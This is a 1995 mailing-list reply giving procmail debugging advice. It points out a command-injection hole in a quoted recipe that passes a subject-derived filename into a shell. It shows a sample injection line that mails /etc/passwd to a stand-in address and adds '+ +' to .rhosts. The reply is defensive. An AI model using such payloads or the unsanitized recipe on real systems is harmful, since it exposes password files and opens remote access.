Re: procmailrc problem...

1995-12-04 15:20:17
You wrote:

| In the below .procmailrc file, if I send a message with the subject of
| "command get ascii me" procmail does the following:
| 1) puts a copy of the message in the backup mh folder
| 2) appends the header to .procmail/who.gz
| [I've tried this rule without the 'c' as well, but it didn't make a
| difference]
| 3) fails to match anything else in the block
| 4) puts the BODY of the message in the inbox mh folder

|         :0 hfwc
|         | /usr/contrib/bin/gzip >> $HOME/.procmail/who.gz

        I think the w)ait flag is messing you up here.  Try it
without.

|         :0
|         * ^Subject: *command *get *bin *\/.*
|         {
|                 FILE="$MATCH"
|
|                 :0 hfw
|                 | formail -rA "X-Loop: wilcoxon"
|
|                 :0 afw
|                 | rm -f tmp.uue; uuencode $FILE $FILE tmp.uue

        Gosh, what happens if I send you 'command get bin  foo; Mail
me(_at_)foo(_dot_)bar < /etc/passwd ; echo + + >> .rhosts'?

        I suggest you take a look at the file server code in the
procmailex man page; it protects you by minimizing whats accepted to a
small set of characters.

Adam

                                                       -Hume